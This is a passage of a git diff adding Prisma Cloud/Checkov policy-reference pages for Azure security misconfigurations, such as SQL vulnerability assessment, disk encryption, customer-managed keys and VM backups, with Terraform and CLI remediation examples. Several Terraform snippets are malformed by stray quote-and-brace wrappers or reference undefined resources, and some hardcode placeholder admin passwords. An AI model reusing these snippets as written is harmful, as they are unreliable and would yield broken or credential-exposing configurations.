++ remote_debugging_enabled = false + }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc new file mode 100644 index 000000000..3e517a9e3 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set.adoc @@ -0,0 +1,52 @@ +== Azure Microsoft Defender for Cloud security alert email notifications is not set +// Azure Microsoft Defender for Cloud Security alert email notifications not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8d78bf42-4e80-4e25-89fa-5f8a7fe8ddb1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/SecurityCenterContactEmails.py[CKV_AZURE_131] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|ARM,Terraform,Bicep,TerraformPlan + +|=== + + + +=== Description + + +Azure Security Center recommends adding one valid security contact email address for each Microsoft Azure subscription. +Security Center emails designated administrators using the defined security contact in case the Microsoft security team find Azure cloud resources are compromised. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_security_center_contact +* *Arguments:* email - (Required) The email of the Security Center Contact. + + +[source,go] +---- +resource "azurerm_security_center_contact" "example" { ++ email = "contact@example.com" + ... 
+} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc new file mode 100644 index 000000000..76cdc373f --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-service-fabric-uses-available-three-levels-of-protection-available.adoc @@ -0,0 +1,59 @@ +== Service Fabric does not use three levels of protection available +// Azure Service Fabric protection levels not set + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 11c073b9-2d09-49f9-9bc0-0d710e7ce1ef + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/ActiveDirectoryUsedAuthenticationServiceFabric.py[CKV_AZURE_126] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Service Fabric provides three levels of protection (None, Sign and EncryptAndSign) for node-to-node communication using a primary cluster certificate. +Set the protection level to ensure that all node-to-node messages are encrypted and digitally signed + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_service_fabric_cluster +* *Arguments:* fabric_settings + + +[source,go] +---- +{ + "resource "azurerm_service_fabric_cluster" "example" { + ... 
++ fabric_settings { ++ name = "Security" ++ parameters = { ++ name = "ClusterProtectionLevel" ++ value = "EncryptAndSign" + } + + }", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc new file mode 100644 index 000000000..719e2ab40 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-sql-servers-enables-data-security-policy.adoc @@ -0,0 +1,98 @@ +== Azure SQL server Defender setting is set to Off +// Microsoft Defender for SQL Server disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 4169132e-ead6-4c01-b147-d2b47b443678 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureMSSQLServerHasSecurityAlertPolicy.yaml[CKV2_AZURE_13] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Defender for SQL provides a new layer of security, which enables customers to detect and respond to potential threats as they occur by providing security alerts on anomalous activities. +Users will receive an alert upon suspicious database activities, potential vulnerabilities, SQL injection attacks, as well as anomalous database access patterns. +Advanced threat protection alerts provide details of suspicious activity and recommend action on how to investigate and mitigate the threat. +//// +=== Fix - Runtime + + +* In Azure CLI* + + + +. Log in to the Azure Portal. + +. Go to the reported SQL server + +. Select 'SQL servers', Click on the SQL server instance you wanted to modify + +. Click on 'Security Center' under 'Security' + +. 
Click on 'Enable Azure Defender for SQL' +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_sql_server, azurerm_mssql_server_security_alert_policy +* *Arguments:* server_name (of _azurerm_mssql_server_security_alert_policy_ ) + + +[source,go] +---- +{ + "resource "azurerm_sql_server" "sql_server_good_1" { + name = "mysqlserver" + resource_group_name = "group" + location = "location" + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_sql_server" "sql_server_good_2" { + name = "mysqlserver" + resource_group_name = "group" + location = "location" + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + + +resource "azurerm_mssql_server_security_alert_policy" "alert_policy_good" { + resource_group_name = "group" + server_name = azurerm_sql_server.sql_server_good_1.name + state = "Enabled" + retention_days = 20 +} + + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc new file mode 100644 index 000000000..be2b35cf8 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-storage-accounts-use-customer-managed-key-for-encryption.adoc @@ -0,0 +1,115 @@ +== Azure Storage account Encryption CMKs Disabled +// Azure Storage account encryption CMKs disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e5ddf10c-4e61-451b-9df1-d97a948017c3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureStorageAccountsUseCustomerManagedKeyForEncryption.yaml[CKV2_AZURE_18] + +|Severity +|LOW + +|Subtype 
+|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +By default all data at rest in Azure Storage account is encrypted using Microsoft Managed Keys. +It is recommended to use Customer Managed Keys to encrypt data in Azure Storage accounts for better control on Storage account data. + +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Log in to Azure Portal + +. Go to Storage accounts dashboard and Click on reported storage account + +. Under the Settings menu, click on Encryption + +. Select Customer Managed Keys ++ +** Choose 'Enter key URI' and Enter 'Key URI' OR ++ +** Choose 'Select from Key Vault', Enter 'Key Vault' and 'Encryption Key' + +. Click on 'Save'" +//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_storage_account_customer_managed_key , azurerm_client_config, azurerm_key_vault, azurerm_key_vault_key + + +[source,go] +---- +{ + "data "azurerm_client_config" "current" {} + +resource "azurerm_key_vault" "example" { + name = "examplekv" + location = "location" + resource_group_name = "group" + tenant_id = data.azurerm_client_config.current.tenant_id + sku_name = "standard" + + purge_protection_enabled = true +} + + +resource "azurerm_key_vault_key" "example" { + name = "tfex-key" + key_vault_id = azurerm_key_vault.example.id + key_type = "RSA" + key_size = 2048 + key_opts = ["decrypt", "encrypt", "sign", "unwrapKey", "verify", "wrapKey"] +} + + + +resource "azurerm_storage_account" "storage_account_good_1" { + name = "examplestor" + resource_group_name = "group" + location = "location" + account_tier = "Standard" + account_replication_type = "GRS" + + identity { + type = "SystemAssigned" + } + +} + +resource "azurerm_storage_account_customer_managed_key" "managed_key_good" { + storage_account_id = azurerm_storage_account.storage_account_good_1.id + key_vault_id = azurerm_key_vault.example.id + key_name = azurerm_key_vault_key.example.name + key_version = "1" +} + +", +} +---- diff --git 
a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc new file mode 100644 index 000000000..116ddbdd7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-unattached-disks-are-encrypted.adoc @@ -0,0 +1,99 @@ +== Unattached disks are not encrypted +// Unattached disks not encrypted + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6cf0b2e7-dae3-4649-8431-54c2c1e350db + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/AzureUnattachedDisksAreEncrypted.yaml[CKV2_AZURE_14] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Encrypting your disks protects your data from unauthorized access and tampering, and ensures that only authorized users can access and modify the contents of your disks. +Encryption helps protect against external threats such as attackers or malware, as well as internal threats such as accidental or unauthorized access. 
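+For illustration, a minimal standalone Terraform sketch of an encrypted managed disk (resource and group names are placeholders; the `encryption_settings` argument's availability depends on the azurerm provider version): + +[source,go] +---- +resource "azurerm_managed_disk" "encrypted_example" { +  name                 = "exampledisk" +  location             = "West Europe" +  resource_group_name  = "example-resources" +  storage_account_type = "Standard_LRS" +  create_option        = "Empty" +  disk_size_gb         = "1" + +  # Keep the disk encrypted even while it is not attached to a VM +  encryption_settings { +    enabled = true +  } +} +---- 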
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_managed_disk, azurerm_virtual_machine +* *Arguments:* encryption_settings.encrypted + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "group" { + name = "example-resources" + location = "West Europe" +} + + +resource "azurerm_managed_disk" "managed_disk_good_1" { + name = "acctestmd" + location = "West US 2" + resource_group_name = azurerm_resource_group.group.name + storage_account_type = "Standard_LRS" + create_option = "Empty" + disk_size_gb = "1" + ++ encryption_settings { ++ enabled = true + } + + tags = { + environment = "staging" + } + +} + + + +resource "azurerm_virtual_machine" "virtual_machine_good_1" { + name = "$vm" + location = "location" + resource_group_name = azurerm_resource_group.group.name + network_interface_ids = ["id"] + vm_size = "Standard_DS1_v2" + storage_image_reference { + publisher = "Canonical" + offer = "UbuntuServer" + sku = "16.04-LTS" + version = "latest" + } + + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_id = azurerm_managed_disk.managed_disk_good_1.id + } + +} + +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc new file mode 100644 index 000000000..b2d351d68 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-also-send-email-notifications-to-admins-and-subscription-owners-is-set-for-an-sql-server.adoc @@ -0,0 +1,104 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' is disabled +// Azure SQL 
Server ADS Vulnerability Assessment (VA) 'Also send email notifications to admins and subscription owners' setting disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 7749b15d-ac15-49c9-b97a-c496ec5132aa + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReportsToAdmins.yaml[CKV2_AZURE_5] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability Assessment (VA) setting 'Also send email notifications to admins and subscription owners'. +VA scan reports and alerts will be sent to admins and subscription owners by enabling setting 'Also send email notifications to admins and subscription owners'. +This may help in reducing time required for identifying risks and taking corrective measures. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = 
azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc new file mode 100644 index 000000000..19ed02249 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-periodic-recurring-scans-is-enabled-on-a-sql-server.adoc @@ -0,0 +1,105 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) Periodic recurring scans is disabled +// Azure SQL Server ADS Vulnerability Assessment (VA) 'Periodic recurring scans' setting disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1b1990cf-fff3-40c0-bd02-7e1ca01cd3f3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAsetPeriodicScansOnSQL.yaml[CKV2_AZURE_3] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Enable Vulnerability 
Assessment (VA) Periodic recurring scans for critical SQL servers and corresponding SQL databases. +VA setting 'Periodic recurring scans' schedules periodic (weekly) vulnerability scanning for the SQL server and corresponding Databases. +Periodic and regular vulnerability scanning provides risk visibility based on updated known vulnerability signatures and best practices. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + " +resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = 
"${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc new file mode 100644 index 000000000..da71b12f5 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-va-setting-send-scan-reports-to-is-configured-for-a-sql-server.adoc @@ -0,0 +1,104 @@ +== Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' is not configured +// Azure SQL Server ADS Vulnerability Assessment (VA) 'Send scan reports to' setting not configured + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 0d407687-9f9f-445c-b471-1f69c1acd55b + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VAconfiguredToSendReports.yaml[CKV2_AZURE_4] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Configure 'Send scan reports to' with email ids of concerned data owners/stakeholders for a critical SQL servers. +Vulnerability Assessment (VA) scan reports and alerts will be sent to email ids configured at *Send scan reports to*. +This may help in reducing time required for identifying risks and taking corrective measures. 
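+The key setting is the recurring_scans block of azurerm_mssql_server_vulnerability_assessment; a minimal sketch (resource identifiers, container path, and addresses are placeholders): + +[source,go] +---- +resource "azurerm_mssql_server_vulnerability_assessment" "example" { +  server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.example.id +  storage_container_path          = "https://examplestorage.blob.core.windows.net/container/" +  storage_account_access_key      = "example-access-key" + +  recurring_scans { +    enabled                   = true +    email_subscription_admins = true +    # Data owners/stakeholders who should receive the VA scan reports +    emails = ["owner@example.com", "dba@example.com"] +  } +} +---- 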
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_resource_group, azurerm_sql_server, azurerm_storage_account, azurerm_storage_container, azurerm_mssql_server_security_alert_policy, azurerm_mssql_server_vulnerability_assessment + + +[source,go] +---- +{ + "resource "azurerm_resource_group" "okExample" { + name = "okExample-resources" + location = "West Europe" +} + + +resource "azurerm_sql_server" "okExample" { + name = "mysqlserver" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + version = "12.0" + administrator_login = "4dm1n157r470r" + administrator_login_password = "4-v3ry-53cr37-p455w0rd" +} + + +resource "azurerm_storage_account" "okExample" { + name = "accteststorageaccount" + resource_group_name = azurerm_resource_group.okExample.name + location = azurerm_resource_group.okExample.location + account_tier = "Standard" + account_replication_type = "GRS" +} + + +resource "azurerm_storage_container" "okExample" { + name = "accteststoragecontainer" + storage_account_name = azurerm_storage_account.okExample.name + container_access_type = "private" +} + + +resource "azurerm_mssql_server_security_alert_policy" "okExample" { + resource_group_name = azurerm_resource_group.okExample.name + server_name = azurerm_sql_server.okExample.name + state = "Enabled" +} + + +resource "azurerm_mssql_server_vulnerability_assessment" "okExample" { + server_security_alert_policy_id = azurerm_mssql_server_security_alert_policy.okExample.id + storage_container_path = "${azurerm_storage_account.okExample.primary_blob_endpoint}${azurerm_storage_container.okExample.name}/" + storage_account_access_key = azurerm_storage_account.okExample.primary_access_key + + recurring_scans { + enabled = true + email_subscription_admins = true + emails = [ + "email@example1.com", + "email@example2.com" + ] + } + +} +", +} +---- diff --git 
a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc new file mode 100644 index 000000000..bc5fcb4a7 --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machine-scale-sets-have-encryption-at-host-enabled.adoc @@ -0,0 +1,57 @@ +== Virtual machine scale sets do not have encryption at host enabled +// Virtual Machine scale sets 'encryption at host' disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| eb556c1a-e906-4172-a30f-8c342fc7e4c3 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMEncryptionAtHostEnabled.py[CKV_AZURE_97] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Use encryption at host to get end-to-end encryption for your virtual machine and virtual machine scale set data. +Encryption at host enables encryption at rest for your temporary disk and OS/data disk caches. +Temporary and ephemeral OS disks are encrypted with platform-managed keys when encryption at host is enabled. +OS/data disk caches are encrypted at rest with either customer-managed or platform-managed key, depending on the encryption type selected on the disk. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_windows_virtual_machine_scale_set +* *Arguments:* encryption_at_host_enabled + + +[source,go] +---- +{ + "resource "azurerm_windows_virtual_machine_scale_set" "example" { + ... + + encryption_at_host_enabled = true + ... 
+ }", + +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc new file mode 100644 index 000000000..eef2ce4ae --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-are-backed-up-using-azure-backup.adoc @@ -0,0 +1,242 @@ +== Virtual Machines are not backed up using Azure Backup +// Virtual Machines not backed up using Azure Backup service + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| db33dfab-90da-4e41-a13b-30c52ba1c187 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/azure/VMHasBackUpMachine.yaml[CKV2_AZURE_12] + +|Severity +|LOW + +|Subtype +|Build +// ,Run +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that Azure Backup service is enabled and configured to create server backups for your Microsoft Azure virtual machines (VMs), in order to follow data security best practices and compliance requirements. +Azure Backup service is a cost-effective, one-click backup solution, that simplifies virtual machine data recovery in your Azure cloud account. +Once Azure Backup service is configured, your virtual machines are backed up according to a precise schedule defined within the appropriate backup policy, then recovery points are created from those backups and stored in the Azure Recovery Services vaults. +//// +=== Fix - Runtime + + +* In Azure Console* + + + +. Sign in to Azure Management Console. + +. Navigate to All resources blade at https://portal.azure.com/#blade/HubsExtension/BrowseAll to access all your Microsoft Azure resources. + +. Choose the Azure subscription that you want to access from the Subscription filter box. + +. 
From the Type filter box, select Virtual machine to list only the Azure virtual machines available in the selected subscription. + +. Click on the name of the virtual machine (VM) that you want to reconfigure. + +. On the navigation panel, under Operations, select Backup to access the Azure Backup service configuration for the selected virtual machine. + +. On the Backup page, perform the following: a. ++ +From the Recovery Service vault choose whether to create a new vault or select an existing one. ++ +An Azure Recovery Service vault is a storage entity that holds the virtual machine backups. ++ +b.From Choose backup policy dropdown list select an existing backup policy or click Create (or edit) a new policy to create/edit a new backup policy. ++ +A backup policy specifies frequency and time at which specified resources will be backed up and how long the backup copies are retained. ++ +c. ++ +Once the backup policy is properly configured, click Enable Backup to enable server backups for the selected Microsoft Azure virtual machine. ++ +You can now start a backup job by using Backup now button or wait for the selected policy to run the job at the scheduled time. ++ +The first backup job creates a full recovery point. ++ +Each backup job after the initial server backup creates incremental recovery points. + +. Repeat steps no. ++ +5 -- 7 to enable server backups for other Azure virtual machines available in the selected subscription. + +. Repeat steps no. ++ +4 -- 8 for each subscription created in your Microsoft Azure cloud account. + + +* In Azure CLI* + + + +. Run backup vault create command (Windows/macOS/Linux) to create a new Azure Recovery Service vault that will hold all the server backups created for the specified Azure virtual machine (VM): ++ + +[source,text] +---- +{ + "az backup vault create + --resource-group cloud-shell-storage-westeurope + --name cc-new-backup-vault + --location westeurope", +} +---- + + +. 
The command output should return the configuration metadata for the new vault: ++ + +[source,text] +---- +{ + "{ + "eTag": null, + "id": "/subscriptions/abcdabcd-1234-abcd-1234-abcdabcdabcd/resourceGroups/cloud-shell-storage-westeurope/providers/Microsoft.RecoveryServices/vaults/cc-new-backup-vault", + "location": "westeurope", + "name": "cc-new-backup-vault", + "properties": { + "provisioningState": "Succeeded", + "upgradeDetails": null + }, + + "resourceGroup": "cloud-shell-storage-westeurope", + "sku": { + "name": "Standard" + }, + + "tags": null, + "type": "Microsoft.RecoveryServices/vaults" +}", + + +} +---- + +. Run backup protection enable-for-vm command (Windows/macOS/Linux) to enable server backups for the selected Microsoft Azure virtual machine. ++ +Use the default backup policy provided by Azure Backup service or run az backup policy set command (Windows/macOS/Linux) to update the default policy if you need to change the backup schedule/frequency and/or the retention period configured. ++ +The default backup protection policy (i.e. ++ +"DefaultPolicy") runs a backup job each day and retains recovery points for 30 days: ++ + +[source,text] +---- +{ + "az backup protection enable-for-vm + --resource-group cloud-shell-storage-westeurope + --vm cc-production-vm + --vault-name cc-new-backup-vault + --policy-name DefaultPolicy", + +} +---- + +. 
The command output should return the backup protection enable-for-vm command request metadata: ++ + +[source,text] +---- +{ + "{ + "eTag": null, + "id": "/subscriptions/abcdabcd-1234-abcd-1234-abcdabcdabcd/resourcegroups/cc-vm-resource-group/providers/microsoft.recoveryservices/vaults/cc-new-backup-vault/backupJobs/abcdabcd-1234-abcd-1234-abcdabcdabcd", + "location": null, + "name": "abcdabcd-1234-abcd-1234-abcdabcdabcd", + "properties": { + "actionsInfo": null, + "activityId": "abcdabcd-1234-abcd-1234-abcdabcdabcd", + "backupManagementType": "AzureIaasVM", + "containerName": ";iaasvmcontainerv2;cc-vm-resource-group;cc-production-vm", + "duration": "0:00:30.975155", + "endTime": "2019-10-29T12:15:00.240606+00:00", + "entityFriendlyName": "cc-production-vm", + "errorDetails": null, + "extendedInfo": { + "dynamicErrorMessage": null, + "estimatedRemainingDuration": null, + "internalPropertyBag": null, + "progressPercentage": null, + "propertyBag": { + "Policy Name": "DefaultPolicy", + "VM Name": "cc-production-vm" + }, + + "tasksList": [] + }, + + "jobType": "AzureIaaSVMJob", + "operation": "ConfigureBackup", + "startTime": "2019-10-29T12:15:00.265451+00:00", + "status": "Completed", + "virtualMachineVersion": "Compute" + }, + + "resourceGroup": "cloud-shell-storage-westeurope", + "tags": null, + "type": "Microsoft.RecoveryServices/vaults/backupJobs" +}", + + +} +---- + +. Repeat steps no. ++ +1 -- 4 to enable server backups for other Azure virtual machines provisioned in the current subscription. + +. Repeat steps no. ++ +1 -- 5 for each subscription available within your Microsoft Azure cloud account. 
+//// + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_backup_protected_vm, azurerm_virtual_machine + + +[source,go] +---- +resource "azurerm_virtual_machine" "example_ok" { + name = "${var.prefix}-vm" + location = azurerm_resource_group.main.location + resource_group_name = azurerm_resource_group.main.name + network_interface_ids = [azurerm_network_interface.main.id] + vm_size = "Standard_DS1_v2" +} + + +resource "azurerm_backup_protected_vm" "vm_protected_backup" { + resource_group_name = azurerm_resource_group.example_ok.name + recovery_vault_name = azurerm_recovery_services_vault.example_ok.name + source_vm_id = azurerm_virtual_machine.example_ok.id + backup_policy_id = azurerm_backup_policy_vm.example_ok.id +} + + +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc new file mode 100644 index 000000000..5196afcef --- /dev/null +++ b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-virtual-machines-use-managed-disks.adoc @@ -0,0 +1,81 @@ +== Azure Linux and Windows Virtual Machines do not use Managed Disks +// Azure Linux and Windows Virtual Machines do not use Managed Disks + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2ada7204-3fa1-4d82-b6af-85322c58bbed + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/azure/VMStorageOsDisk.py[CKV_AZURE_92] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Azure Managed Disks offer several advantages over traditional blob-based VHDs: they are encrypted by default, reduce cost compared to storage accounts, and are more resilient because Microsoft manages the disk storage and moves it if the underlying hardware becomes faulty. +It is recommended to migrate blob-based VHDs to Managed Disks. +//// +=== Fix - Runtime + + +*In Azure Portal* + + + +. Log in to the Azure Portal + +. Select 'Virtual Machines' from the left pane + +. Select the reported virtual machine + +. Select 'Disks' under 'Settings' + +. Click on 'Migrate to managed disks' + +. Select 'Migrate' +//// +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* azurerm_windows_virtual_machine +* *Arguments:* storage_os_disk + + +[source,go] +---- +resource "azurerm_windows_virtual_machine" "example" { + ... + + storage_os_disk { + name = "myosdisk1" + caching = "ReadWrite" + create_option = "FromImage" + managed_disk_type = "Standard_LRS" + } + + ... +} +---- diff --git a/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc b/code-security/policy-reference/azure-policies/azure-general-policies/ensure-that-vulnerability-assessment-va-is-enabled-on-a-sql-server-by-setting-a-storage-account.adoc new file mode 100644 index 000000000..c6c5ebaa3 --- /dev/null +++ 